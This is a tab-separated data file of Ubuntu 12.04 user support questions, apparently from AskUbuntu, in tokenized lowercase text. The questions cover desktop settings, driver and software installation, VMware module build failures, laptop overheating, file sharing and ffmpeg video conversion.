133200	how to decrease the `` hump '' that is required to move the mouse over a sticky edge ?	i love the sticky edge feature in unity . however , i find it presents too much of a hurdle to move the mouse between windows . is there a setting to make it easier to move across -- more of a subtle bump than a large hump ? i assume it 's in dconf editor somewhere , but i ca n't find it .
133202	empathy ca n't connect to facebook	i have problem with the empathy , on ubuntu 12.04 ! i try to login with my facebook information . i receive message ( i use my ubuntu in bulgarian language ) `` unable to identify the registration facebook '' ... my pass and account name is correct ... please help !
133205	how sync ubuntu one contacts with thunderbird on ubuntu 12.04 ( release version ) ?	i did n't find a solution for this . i think is not possible sync contacts with ubuntu one on ubuntu 12.04 . any idea please ? thanks in advance ! note : please , this is not a duplicate of these : how to sync contacts in 12.04 with thunderbird / ubuntu one ? how to sync ubuntu one contacts with thunderbird ? how can i get thunderbird contacts to sync with ubuntu one ? is maybe a bug on ubuntu 12.04 ?
133207	how can i disable the multitouch gestures in ubuntu ?	my workstation with ubuntu 12.04 is a macbook pro which supports a multitouch trackpad . unfortunately , i 'm constantly accidentally triggering the three finger touch gesture to resize a window : how can i disable this gesture ?
133208	how to install package from older repo	i want to install for example http : //packages.ubuntu.com/natty/window-picker-applet
133209	how does a complete computer idiot like me upgrade	i have just clicked and run ubuntu in preference to the windows side of the hd , but it appears that i am running an old version and that i need to upgrade , but i believe that i ca n't go straight from 10. something to the current one . also try as i may i cant get my printer to work with ubuntu although it used to . flash player useless as well
133210	how to disable screen edge obstruction in kde ?	whenever i enable any action in kde - > system settings - > workspace behaviour - > screen edges selected screen edge becomes unreachable by the pointer which is bounces against it . i do n't want to apply additional pressure to activate the screen edge . how do i disable this misfeature ?
133214	i want to design one small software for 1st standard student for educational purpose	i want to design one small software for 1st standard student for educational purpose . will you sugest some best software /game making tool , which i can understand fast also write small applications very fast . i have complete engineering in electronics , hence having very little knowledge of programming .
133216	trouble installing java due to `` ./install.sfx : not found '' error	i am running ubuntu 12.04 lts . i wanted to install java and so i downloaded the 32-bit self extracting .bin file from http : //www.java.com and tried to install it according to their instruction . first i made the file an executable one . then created /usr/java/ . after that i have to run this command : ./jre-7u < version > -linux-i586.bin . but i 'm stuck here . my java version is java 6 u32 . when i enter the command it says `` no such file or directory '' . what to do ? please help . also i 'm trying to install 32-bit java on my 64-bit precise . could that possibly be the problem ? i tried to follow second answer by jonas christensen . i tried to open it , it says file is an unknown type . i tried the terminal command : ./jre-6u31-linux-i586.bin . but it gave this : unpacking ... checksumming ... extracting ... ./jre-6u32-linux-i586.bin : 86 : ./jre-6u32-linux-i586.bin : ./install.sfx.5736 : not found failed to extract the files . please refer to the troubleshooting section of the installation instructions on the download page for more information .
133217	acer aspire 4741g is overheating	my laptop is acer aspire 4741g : cpu : intel core i5 460m ( 2,53ghz ) 6 gb ram ( kingston ddr3 2gb+4gb ) 320 gb hdd nvidia ge force gt 420m ( 1 gb ) tried ubuntu 10.04 , 10.10 , 11.10 , 12.04 , here are the results : 10.04 - no overheat , usual t=50-55c - only troubles in installing video drivers for gt420m 10.10 - no overheat , usual t=50-55c - only troubles in installing video drivers for gt420m 11.10 - proprietary drivers for video are just fine , but overheats ( t=60-70 c ) 12.04 - proprietary drivers for video are just fine , but overheats ( t=60-70 c ) for 11 . * & 12.04 - when just installed - temperature is almost normal ( idle t=55-60 , when watching video 's t=60-65 c ) . after about 1-2 days ( installed : chromium browser , mozilla thunderbird , pcsx-r , qbittorrent , skype , smplayer . ) the temperature went up till : idle t=65-70c , working t=70-80c ( note-the temperature goes up after 1-5 minutes after booting computer , and i do n't start such programs , as qbittorrent , skype , smplayer , pcsx-r etc ) . tried to re-install video drivers , no luck , temperatures are all the same : idle t=65-70c , working t=70-80c ( also in idle found , that some of the screenlets are lagging , & videos have mistiming glitches , which could be solved only by restarting the application ) . p.s . : needless to say , that laptop is always in my hands , or on table , & there is always 1-2 inches gap between bottom of laptop , & any surfaces . p.p.s . : i have windows 7 dual boot on this laptop & temperatures in windows are much different ( idle= 45-55 c , working= 60-65c )
133218	how can i speed up abiword 2.9.2 in xubuntu ? it runs too slow .	abiword 2.8.6 in 11.10 was fine for me . after a 12.04 fresh install , abiword 2.9.2 is now available ... and i definitly ca n't use it ! scrolling the text with the mousewheel is impossible . it only works in the lift at the very right of the screen . everything is very slow . e.g . ctrl + g ( go to page ... ) needs several seconds to display . it then needs a few more seconds before i can type the page number i want to reach the rule at the top of the text no more exists . a black line is dsplayed when going down in the texte , display briefly disapears ( 1 or 2 tenth of a second ) between each new line since i definitly ca n't work with it , i restored 11.10 . abiword website tell version 2.9.2 is unstable and should not be used i think about a compatibility problem with gtk do you know more about that ?
133222	how to reduce disk usage on a live usb 12.04 system ?	i 'm using ubuntu 12.04 , the live usb version . soon virtual disk on live usb gets full , after apt-get update . df -h / shows : filesystem size used avail use % mounted on /cow 124m 124m 0 100 % / how can i reduce disk usage on this live system ?
133229	ppa : ikarosdev/unity-revamped stopped working after an update from update manager	i had installed unity-revamped from ppa as per omgubuntu 's instructions and all was working fine until i installed a few updates from update manager and now the ubuntu launcher does n't hide . how can i fix this ?
133231	assistance needed for conducting file searches	i have been finding it difficult to find the files i need on my system and could use some advice or documentation source . out of the box using the file manager , i have a search box , but i can not find settings for it and have no idea how comprehensive the search it is conducting is . is it recursive in subdirectories ? is it searching the content of files , if so which kinds ? etc . i can find very little online about the search engine or how to use it . some info states that tracker is included by default . if so , i can not find it in the applications menu , although there is a file called kernal oops tracker . is that the app ? i 'm sure there has to be a better approach than what i have found so far . any help is appreciated . added : i come from windows world , and my basic expectation is that a file search engine include : search the contents of a file file type , dates , file size filters etc . a display that tells be what subdirectory a 'found ' file is in as well as other relevant file info . some basic documentation on how to use any of these capabilities if they exist
133235	how do i allow non-root access to /ttyusb0 on 12.04 ?	since i updated from 10.04 to 12.04 , i am unable to acces the device connected in /ttyusb0 if i dont have root access . to be more specific , i use a usb-to-serial com port converter to acces and configure cisco equipment with a software called putty . it happens that , since i upgraded to 12.04 , putty only sees the connected device when i run it as `` gksudo putty '' . if not , it says `` unable to connect to port /ttyusb0 '' . i have managed to change the permissions via chmod 666 , and it works , but if i disconnect the usb and reconnect , it goes back to root only . how do i permanently allow non-root access ? i have a clue it might be via udev rules , but i have no ideia how to do it . obs . manufacturer and drivers `` prolific ''
133242	facing unity problems after upgrading to ubuntu 12.04	i upgraded to 12.04 and had problems with unity . so this is what i did > > 1 ) ctrl+alt+f1 sudo apt-get install compizconfig-settings-manager export display=:0 ccsm 2 ) ctrl+alt+f7 3 ) enabled unityplugin 4 ) ctrl+alt+f1 unity -- replace it worked with a couple of error messages now i have to put in start up application export display=:0 unity -- replace nvidia software recognizes my monitor but ubuntu sees it as laptop . something is n't right . can someone point out what info i need to put here for people to help . i have been upgrading this from 8 ish so have altered lots especially when compiz fusion first came out . also if i run recovery session and type unity -- replace it starts and runs fine .
133245	ubuntu 12.04 installation problems	i am new with ubuntu , and i am trying to install it on my old pc . just after the `` verifying the installation configuration '' prompt , i get the `` no root file system -- no root file system is defined . please correct this from the partitioning menu '' error . i need help .
133251	where is the font size selection tool that used to be in the appearance area ?	i need to resize the system fonts for the apps but i ca n't find it anymore , it used to be in appearance but not anymore . help
133259	menu bars not integrated with unity 's global menu bar	i upgrade from lucid via update-manager -d and the upgrade went fine . however , i did n't get unity 's global menu . windows stil have their indivual menu bars . this happens for all applications . does this typically occur ? can this be fixed with a configuration setting ?
133261	file sharing on secondary drive	i have a bunch of files i want to share on my second internal drive . i have file sharing off the primary ( system ) drive working file - created a samba share user , and i can right-click on the folders i want to share and turn on sharing and it works . but when i do the same thing off any folder on the secondary drive , it appears to work . then when i try to access it over the network , the share appears , but upon connecting to the folder i get a message , `` the operation ca n't be completed because the original item for 'sharename ' ca n't be found . '' where 'sharename ' is the name of my share . that is on a os/x box but i have similar problems when i try accessing it through my bluray player ( which on a previous install of ubuntu could access the share just fine ) . this question seems similar to mine but it has no answers : sharing external drive i thought maybe it was because the drive was auto-mounted , so i added the following line to my fstab to no avail : /dev/sda1 /media/storagedrive ext4 rw , nosuid , nodev , uhelper=udisks 0 0 then i thought it could be the mount permissions on my second hdd ( since i am logging in remotely with an account specifically created for this ) : drwx -- -- -- 6 mainuser mainuser 4096 may 6 12:46 storagedrive but when i sudo chmod a+r storagedrive it still does n't work , despite the permissions changing for that mount session : drwxr -- r -- 6 mainuser mainuser 4096 may 6 12:46 storagedrive any thoughts ? requested info lsblk name maj : min rm size ro type mountpoint sda 8:0 0 1.8t 0 disk └─sda1 8:1 0 1.8t 0 part /media/storagedrive sr0 11:0 1 1024m 0 rom sdb 8:16 0 83.9g 0 disk ├─sdb1 8:17 0 71.9g 0 part / ├─sdb2 8:18 0 1k 0 part └─sdb5 8:21 0 12g 0 part [ swap ] # /etc/fstab : static file system information . # # use 'blkid ' to print the universally unique identifier for a # device ; this may be used with uuid= as a more robust way to name devices # that works even if disks are added and removed . see fstab ( 5 ) . # # < file system > < mount point > < type > < options > < dump > < pass > proc /proc proc nodev , noexec , nosuid 0 0 # / was on /dev/sda1 during installation uuid=4f2a50b6-078a-4a7f-b194-db2f3d66a050 / ext4 errors=remount-ro , user_xattr 0 1 # swap was on /dev/sda5 during installation uuid=f7925973-e0e7-4b52-a449-0097230d4aa0 none swap sw 0 0 /dev/fd0 /media/floppy0 auto rw , user , noauto , exec , utf8 0 0 # storagedrive ( uuid so it always identifies the right drive ) uuid= '' 1fe509d8-f4d8-454d-83cc-b74bfb1f1731 '' /media/storagedrive ext4 rw , nosuid , nodev , uhelper=udisks , gid=media 0 0
133263	after installing postfix , why does n't it pop up the configuration interface	when i first time install postfix , after install , an interface would pop up and ask me which type to choose from ; something like : internet : satellite : smarthost : local only : today i removed postfix using : sudo apt-get remove postfix and i tried to install it again using : sudo apt-get install postfix after install , no interface pops up . how can i make it show up again ? thanks .
133264	how to install from ubuntu installation ubiquity skipped plugins and updates	what packages are being installed with checking 1st and 2nd option ? how with one line install it all ?
133272	how do i install remastersys ?	i was following instruction from http : //www.remastersys.com/ubuntu.html to install remastersys in my system . on apt-get update always get error that the could not find correct structure of url . any help ?
133274	can not run okular due to `` unable to find okular component error ''	i 've installed ubuntu 12.04 and installed okular but with normal user i ca n't run okular and give me an error that `` unable to find the okular component . '' but with root user i can run it without any errors . what should i do ? i 've tried to purge and install okular itself , but this has not worked .
133276	osx lion wo n't mount or read from ubuntu 12.04 on a usb	i am unable to install ubuntu 12.04 onto a macbook pro 4,1 or even mount it on an imac with a lion install after following guide on install page . is this issue known or am i doing something wrong ? the usb shows a cd sized fat partition on the 4gb usb .
133278	how do i change the unity icon color background ?	basically i want to change the light grey background of rhthmbox unity icon by a light green one or another color . well the idea is to find a tweak to operate for each app background light color . so ... is there some way to do do that ?
133281	shell script to start a new process but close the terminal window	i am new to shell scripting . i am writing a startup script that takes an argument and launches a process based on the argument value . example : i want to launch my groovyconsole located inside some directory using the starter script like this . sh starter.sh groovy inside the script this is the logic if [ $ 1 = `` groovy '' ] then cd works/groovy/groovy-1.8.6/bin ./groovyconsole fi this does start the process but i see that this process is bind with the terminal window . if i close the terminal window the process is being killed ( obviously ) . so i want to know if there is a way that running the above command will execute the script and start the process but close the terminal window ?
133285	how to fix `` unable to start services '' in vmware player 4.0.3. on ubuntu 12.04 32 bit	i just updated to ubuntu 12.04 and installed the lastest vmware ( 4.0.3 ) . when it starts it shows `` before you can run vmware , several modules must be compiled and loaded into running kernel '' . after compiling it shows `` unable to start services . see log file /tmp/vmware-root/modconfig-17200.log for details '' . the log is : 2012-05-07t12:43:24.786-03:00| vthread-3| i120 : log for vmware workstation pid=17200 version=8.0.3 build=build-703057 option=release 2012-05-07t12:43:24.786-03:00| vthread-3| i120 : the process is 32-bit . 2012-05-07t12:43:24.786-03:00| vthread-3| i120 : host codepage=utf-8 encoding=utf-8 2012-05-07t12:43:24.786-03:00| vthread-3| i120 : host is linux 3.2.0-24-generic-pae ubuntu 12.04 lts 2012-05-07t12:43:24.785-03:00| vthread-3| i120 : msg_reset : 2012-05-07t12:43:24.785-03:00| vthread-3| i120 : [ msg.dictionary.load.openfailed ] can not open file `` /usr/lib/vmware/settings '' : no such file or directory . 2012-05-07t12:43:24.785-03:00| vthread-3| i120 : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 2012-05-07t12:43:24.785-03:00| vthread-3| i120 : pref optional preferences file not found at /usr/lib/vmware/settings . using default values . 2012-05-07t12:43:24.786-03:00| vthread-3| i120 : msg_reset : 2012-05-07t12:43:24.786-03:00| vthread-3| i120 : [ msg.dictionary.load.openfailed ] can not open file `` /root/.vmware/config '' : no such file or directory . 2012-05-07t12:43:24.786-03:00| vthread-3| i120 : -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- 2012-05-07t12:43:24.786-03:00| vthread-3| i120 : pref optional preferences file not found at /root/.vmware/config . using default values . 2012-05-07t12:43:24.786-03:00| vthread-3| w110 : logging to /tmp/vmware-root/modconfig-17200.log 2012-05-07t12:43:24.901-03:00| vthread-3| i120 : modconf query interface initialized 2012-05-07t12:43:24.922-03:00| vthread-3| i120 : modconf library initialized 2012-05-07t12:43:24.948-03:00| vthread-3| i120 : your gcc version : 4.6 2012-05-07t12:43:24.952-03:00| vthread-3| i120 : validating path /lib/modules/preferred/build/include for kernel release 3.2.0-24-generic-pae 2012-05-07t12:43:24.952-03:00| vthread-3| i120 : failed to find /lib/modules/preferred/build/include/linux/version.h 2012-05-07t12:43:24.952-03:00| vthread-3| i120 : failed version test : /lib/modules/preferred/build/include/linux/version.h not found . 2012-05-07t12:43:24.952-03:00| vthread-3| i120 : validating path /lib/modules/3.2.0-24-generic-pae/build/include for kernel release 3.2.0-24-generic-pae 2012-05-07t12:43:24.954-03:00| vthread-3| i120 : your gcc version : 4.6 2012-05-07t12:43:24.962-03:00| vthread-3| i120 : your gcc version : 4.6 2012-05-07t12:43:24.988-03:00| vthread-3| i120 : header path /lib/modules/3.2.0-24-generic-pae/build/include for kernel release 3.2.0-24-generic-pae is valid . 2012-05-07t12:43:24.988-03:00| vthread-3| i120 : validating path /lib/modules/3.2.0-24-generic-pae/build/include for kernel release 3.2.0-24-generic-pae 2012-05-07t12:43:24.990-03:00| vthread-3| i120 : your gcc version : 4.6 2012-05-07t12:43:24.997-03:00| vthread-3| i120 : your gcc version : 4.6 2012-05-07t12:43:25.024-03:00| vthread-3| i120 : header path /lib/modules/3.2.0-24-generic-pae/build/include for kernel release 3.2.0-24-generic-pae is valid . 2012-05-07t12:43:25.043-03:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-24-generic-pae . 2012-05-07t12:43:25.046-03:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-24-generic-pae . 2012-05-07t12:43:25.049-03:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-24-generic-pae . 2012-05-07t12:43:25.052-03:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-24-generic-pae . 2012-05-07t12:43:25.056-03:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-24-generic-pae . 2012-05-07t12:43:25.070-03:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-24-generic-pae . 2012-05-07t12:43:25.072-03:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-24-generic-pae . 2012-05-07t12:43:25.075-03:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-24-generic-pae . 2012-05-07t12:43:25.077-03:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-24-generic-pae . 2012-05-07t12:43:25.079-03:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-24-generic-pae . 2012-05-07t12:43:25.081-03:00| vthread-3| i120 : validating path /lib/modules/preferred/build/include for kernel release 3.2.0-24-generic-pae 2012-05-07t12:43:25.081-03:00| vthread-3| i120 : failed to find /lib/modules/preferred/build/include/linux/version.h 2012-05-07t12:43:25.081-03:00| vthread-3| i120 : failed version test : /lib/modules/preferred/build/include/linux/version.h not found . 2012-05-07t12:43:25.081-03:00| vthread-3| i120 : validating path /lib/modules/3.2.0-24-generic-pae/build/include for kernel release 3.2.0-24-generic-pae 2012-05-07t12:43:25.083-03:00| vthread-3| i120 : your gcc version : 4.6 2012-05-07t12:43:25.090-03:00| vthread-3| i120 : your gcc version : 4.6 2012-05-07t12:43:25.111-03:00| vthread-3| i120 : header path /lib/modules/3.2.0-24-generic-pae/build/include for kernel release 3.2.0-24-generic-pae is valid . 2012-05-07t12:43:25.128-03:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-24-generic-pae . 2012-05-07t12:43:25.130-03:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-24-generic-pae . 2012-05-07t12:43:25.133-03:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-24-generic-pae . 2012-05-07t12:43:25.135-03:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-24-generic-pae . 2012-05-07t12:43:25.138-03:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-24-generic-pae . 2012-05-07t12:43:25.140-03:00| vthread-3| i120 : validating path /lib/modules/preferred/build/include for kernel release 3.2.0-24-generic-pae 2012-05-07t12:43:25.140-03:00| vthread-3| i120 : failed to find /lib/modules/preferred/build/include/linux/version.h 2012-05-07t12:43:25.140-03:00| vthread-3| i120 : failed version test : /lib/modules/preferred/build/include/linux/version.h not found . 2012-05-07t12:43:25.140-03:00| vthread-3| i120 : validating path /lib/modules/3.2.0-24-generic-pae/build/include for kernel release 3.2.0-24-generic-pae 2012-05-07t12:43:25.142-03:00| vthread-3| i120 : your gcc version : 4.6 2012-05-07t12:43:25.150-03:00| vthread-3| i120 : your gcc version : 4.6 2012-05-07t12:43:25.175-03:00| vthread-3| i120 : header path /lib/modules/3.2.0-24-generic-pae/build/include for kernel release 3.2.0-24-generic-pae is valid . 2012-05-07t12:43:25.207-03:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-24-generic-pae . 2012-05-07t12:43:25.211-03:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-24-generic-pae . 2012-05-07t12:43:25.213-03:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-24-generic-pae . 2012-05-07t12:43:25.216-03:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-24-generic-pae . 2012-05-07t12:43:25.218-03:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-24-generic-pae . 2012-05-07t12:43:25.449-03:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-24-generic-pae . 2012-05-07t12:43:25.450-03:00| vthread-3| i120 : validating path /lib/modules/3.2.0-24-generic-pae/build/include for kernel release 3.2.0-24-generic-pae 2012-05-07t12:43:25.452-03:00| vthread-3| i120 : your gcc version : 4.6 2012-05-07t12:43:25.462-03:00| vthread-3| i120 : your gcc version : 4.6 2012-05-07t12:43:25.491-03:00| vthread-3| i120 : header path /lib/modules/3.2.0-24-generic-pae/build/include for kernel release 3.2.0-24-generic-pae is valid . 2012-05-07t12:43:25.491-03:00| vthread-3| i120 : building module vmmon . 2012-05-07t12:43:25.491-03:00| vthread-3| i120 : extracting the sources of the vmmon module . 2012-05-07t12:43:25.501-03:00| vthread-3| i120 : building module with command : /usr/bin/make -j -c /tmp/vmware-root/modules/vmmon-only auto-build support_smp=1 header_dir=/lib/modules/3.2.0-24-generic-pae/build/include cc=/usr/bin/gcc grep=/usr/bin/make is_gcc_3=no vmccver=4.6 2012-05-07t12:43:29.241-03:00| vthread-3| i120 : installing module vmmon from /tmp/vmware-root/modules/vmmon.o to /lib/modules/3.2.0-24-generic-pae/misc . 2012-05-07t12:43:29.242-03:00| vthread-3| i120 : registering file : /usr/lib/vmware-installer/2.0/vmware-installer -- register-file vmware-vmx regular /lib/modules/3.2.0-24-generic-pae/misc/vmmon.ko 2012-05-07t12:43:30.300-03:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-24-generic-pae . 2012-05-07t12:43:30.300-03:00| vthread-3| i120 : validating path /lib/modules/3.2.0-24-generic-pae/build/include for kernel release 3.2.0-24-generic-pae 2012-05-07t12:43:30.302-03:00| vthread-3| i120 : your gcc version : 4.6 2012-05-07t12:43:30.309-03:00| vthread-3| i120 : your gcc version : 4.6 2012-05-07t12:43:30.333-03:00| vthread-3| i120 : header path /lib/modules/3.2.0-24-generic-pae/build/include for kernel release 3.2.0-24-generic-pae is valid . 2012-05-07t12:43:30.333-03:00| vthread-3| i120 : building module vmnet . 2012-05-07t12:43:30.333-03:00| vthread-3| i120 : extracting the sources of the vmnet module . 2012-05-07t12:43:30.340-03:00| vthread-3| i120 : building module with command : /usr/bin/make -j -c /tmp/vmware-root/modules/vmnet-only auto-build support_smp=1 header_dir=/lib/modules/3.2.0-24-generic-pae/build/include cc=/usr/bin/gcc grep=/usr/bin/make is_gcc_3=no vmccver=4.6 2012-05-07t12:43:32.352-03:00| vthread-3| i120 : failed to compile module vmnet ! 2012-05-07t12:43:32.357-03:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-24-generic-pae . 2012-05-07t12:43:32.357-03:00| vthread-3| i120 : validating path /lib/modules/3.2.0-24-generic-pae/build/include for kernel release 3.2.0-24-generic-pae 2012-05-07t12:43:32.359-03:00| vthread-3| i120 : your gcc version : 4.6 2012-05-07t12:43:32.367-03:00| vthread-3| i120 : your gcc version : 4.6 2012-05-07t12:43:32.393-03:00| vthread-3| i120 : header path /lib/modules/3.2.0-24-generic-pae/build/include for kernel release 3.2.0-24-generic-pae is valid . 2012-05-07t12:43:32.393-03:00| vthread-3| i120 : building module vmblock . 2012-05-07t12:43:32.393-03:00| vthread-3| i120 : extracting the sources of the vmblock module . 2012-05-07t12:43:32.402-03:00| vthread-3| i120 : building module with command : /usr/bin/make -j -c /tmp/vmware-root/modules/vmblock-only auto-build support_smp=1 header_dir=/lib/modules/3.2.0-24-generic-pae/build/include cc=/usr/bin/gcc grep=/usr/bin/make is_gcc_3=no vmccver=4.6 2012-05-07t12:43:39.651-03:00| vthread-3| i120 : installing module vmblock from /tmp/vmware-root/modules/vmblock.o to /lib/modules/3.2.0-24-generic-pae/misc . 2012-05-07t12:43:39.651-03:00| vthread-3| i120 : registering file : /usr/lib/vmware-installer/2.0/vmware-installer -- register-file vmware-vmx regular /lib/modules/3.2.0-24-generic-pae/misc/vmblock.ko 2012-05-07t12:43:40.798-03:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-24-generic-pae . 2012-05-07t12:43:40.798-03:00| vthread-3| i120 : validating path /lib/modules/3.2.0-24-generic-pae/build/include for kernel release 3.2.0-24-generic-pae 2012-05-07t12:43:40.801-03:00| vthread-3| i120 : your gcc version : 4.6 2012-05-07t12:43:40.821-03:00| vthread-3| i120 : your gcc version : 4.6 2012-05-07t12:43:40.847-03:00| vthread-3| i120 : header path /lib/modules/3.2.0-24-generic-pae/build/include for kernel release 3.2.0-24-generic-pae is valid . 2012-05-07t12:43:40.848-03:00| vthread-3| i120 : building module vmci . 2012-05-07t12:43:40.848-03:00| vthread-3| i120 : extracting the sources of the vmci module . 2012-05-07t12:43:40.857-03:00| vthread-3| i120 : building module with command : /usr/bin/make -j -c /tmp/vmware-root/modules/vmci-only auto-build support_smp=1 header_dir=/lib/modules/3.2.0-24-generic-pae/build/include cc=/usr/bin/gcc grep=/usr/bin/make is_gcc_3=no vmccver=4.6 2012-05-07t12:43:43.301-03:00| vthread-3| i120 : installing module vmci from /tmp/vmware-root/modules/vmci.o to /lib/modules/3.2.0-24-generic-pae/misc . 2012-05-07t12:43:43.301-03:00| vthread-3| i120 : registering file : /usr/lib/vmware-installer/2.0/vmware-installer -- register-file vmware-vmx regular /lib/modules/3.2.0-24-generic-pae/misc/vmci.ko 2012-05-07t12:43:44.466-03:00| vthread-3| i120 : trying to find a suitable pbm set for kernel 3.2.0-24-generic-pae . 2012-05-07t12:43:44.466-03:00| vthread-3| i120 : validating path /lib/modules/3.2.0-24-generic-pae/build/include for kernel release 3.2.0-24-generic-pae 2012-05-07t12:43:44.468-03:00| vthread-3| i120 : your gcc version : 4.6 2012-05-07t12:43:44.476-03:00| vthread-3| i120 : your gcc version : 4.6 2012-05-07t12:43:44.503-03:00| vthread-3| i120 : header path /lib/modules/3.2.0-24-generic-pae/build/include for kernel release 3.2.0-24-generic-pae is valid . 2012-05-07t12:43:44.503-03:00| vthread-3| i120 : building module vmci . 2012-05-07t12:43:44.503-03:00| vthread-3| i120 : extracting the sources of the vmci module . 2012-05-07t12:43:44.514-03:00| vthread-3| i120 : building module with command : /usr/bin/make -j -c /tmp/vmware-root/modules/vmci-only auto-build support_smp=1 header_dir=/lib/modules/3.2.0-24-generic-pae/build/include cc=/usr/bin/gcc grep=/usr/bin/make is_gcc_3=no vmccver=4.6 2012-05-07t12:43:45.089-03:00| vthread-3| i120 : building module vsock . 2012-05-07t12:43:45.089-03:00| vthread-3| i120 : extracting the sources of the vsock module . 2012-05-07t12:43:45.098-03:00| vthread-3| i120 : building module with command : /usr/bin/make -j -c /tmp/vmware-root/modules/vsock-only auto-build support_smp=1 header_dir=/lib/modules/3.2.0-24-generic-pae/build/include cc=/usr/bin/gcc grep=/usr/bin/make is_gcc_3=no vmccver=4.6 2012-05-07t12:43:48.932-03:00| vthread-3| i120 : installing module vsock from /tmp/vmware-root/modules/vsock.o to /lib/modules/3.2.0-24-generic-pae/misc . 2012-05-07t12:43:48.933-03:00| vthread-3| i120 : registering file : /usr/lib/vmware-installer/2.0/vmware-installer -- register-file vmware-vmx regular /lib/modules/3.2.0-24-generic-pae/misc/vsock.ko is there a fix for this ? related question ( for 64bits , did n't work for me - the script runs successfully , but nothing changes ) : vmware player 4.0.3. on ubuntu 12.04 64 bit
133286	how can i make my windows transparent by doing alt+mouse scroll ?	pressing and holding alt + scrolling with the mouse wheel used to give me a transparent window , is there any way i can get that or something similar in ubuntu 12.04 ?
133287	how can i convert .mp4 files to .3gp using ffmpeg ?	i would like to download a few videos from youtube and convert them to 3gp so that i can play them on my phone . i would like to know how this can be done using ffmpeg . i tried the various results on the net only to get the following errors . i used : ffmpeg -i dil.mp4 -sameq -ab 64k -ar 44100 dilenada.3gp i got : unsupported codec for output stream # 0.1 seems stream 0 codec frame rate differs from container frame rate : 2000.00 ( 2000/1 ) - > 29.92 ( 359/12 ) i used : ffmpeg -y -i dil.mp4 -r 20 -s 352x288 -b 400k -acodec libfaac -ac 1 -ar 2000 -ab 24k dilenada.3gp i got : seems stream 0 codec frame rate differs from container frame rate : 2000.00 ( 2000/1 ) - > 29.92 ( 359/12 ) unknown encoder 'libfaac' what am i doing wrong ?
133289	problem creating bootable usb drive - v12.04 - win xp sp3 - asus eeepc 901	just another new guy in town trying to find his way around . let 's cut to the chase : i got this error after doing what is explained below the screen shot . ( first time posting a photo link in this manner as well . ) it says : `` universal usb installer 1.8.9.6 setup extract : error writing to file c : \docume~1\chadm~1.bal\locals~1\temp\nse18.tmplpaypal.bmp '' i attempted to create a bootable usb drive ( 16gb sandisk ) using pendrivelinux to run 12.04 on my asus eeepc 901 netbook , but did n't have enough hard disk space to download the ubuntu .iso file . so , i popped the usb into my dell laptop to perform the iso file download . then , moved the usb drive back into the eeepc . after selecting the .iso file from the usb drive , i got the above error . what did i do wrong ? thank you for reading and the support !
133293	script to tell 12.04 kernel to maintain battery power saving features on ac	laptop runs perfectly cool on battery but immediately i remove the battery the laptop goes all guns blazing and begins to overheat . how can i instruct the kernel to maintain the power saving features ( used on battery ) when using ac ? hp pavilion dv6700 intel core 2 duo 2.0ghz 4gb ram intel mobile chipset 965gm ( x3100 ) jupiter is already installed and set to power savings . problem is once the kernel detects it running on battery it sort of ignores jupiter and other power saving features . it seems these fears only kick in when running on battery . jupiter does keep power savings on but the laptop starts to overheat only on ac . i just want it to run like how it does when running on battery .
133300	zgrep - searching multiple , precise files	i 'm trying to search multiple zipped files from a single directory . i 'm using zgrep to currently search through either one individual file or all based on a wild card character . here 's what i 'm currently trying : files : 04112012.z , 04122012.z , 04132012.z , etc etc . zgrep < search criteria > 0412* | less is there any way that i can search say , only 04112012.z and 04122012.z specifically ? thanks .
133303	gnome shell notifications without text	i 've just changed the theme of my gnome shell . sine then the notifications appears with out text .. i can click in the icon but no text is shown how can i solve this ?
133305	why can i not install the latest version of gscan2pdf ?	i installed gscan2pdf 0.9. ? something from the software center . it has bugs in it that will not allow me to import a pdf with images without gscan only importing the images and ignoring the text . i found this online and read that it is fixed in gscan2pdf-1.0.4 which is available on sourceforge . whenever i try to install it thought it , the install fails and synaptic will not update past 0.9 . why is this and how can i get gscan2pdf-1.0.4 on my computer ? thank you .
133314	how do i install a gadmei tv tuner ( utv380 )	how do i install a tv tuner gadmei utv380 ( hybrid ) . i 've been searching around the internet . everytime i run tvtime it always detects my webcam as a video source .
133318	how do i change the language via a terminal ?	using system settings i changed my language to arabic and deleted the english language from the settings . then the computer lagged and it logged out - now i ca n't log back in because the login is in arabic . so is there a way to default my language via terminal , default the login password language , or login via terminal which is still in english . i only have access to guest and a terminal . i changed the pasword to something that could be translated into arabic http : //www.psychocats.net/ubuntu/resetpassword - then loged in and used system settings to default .
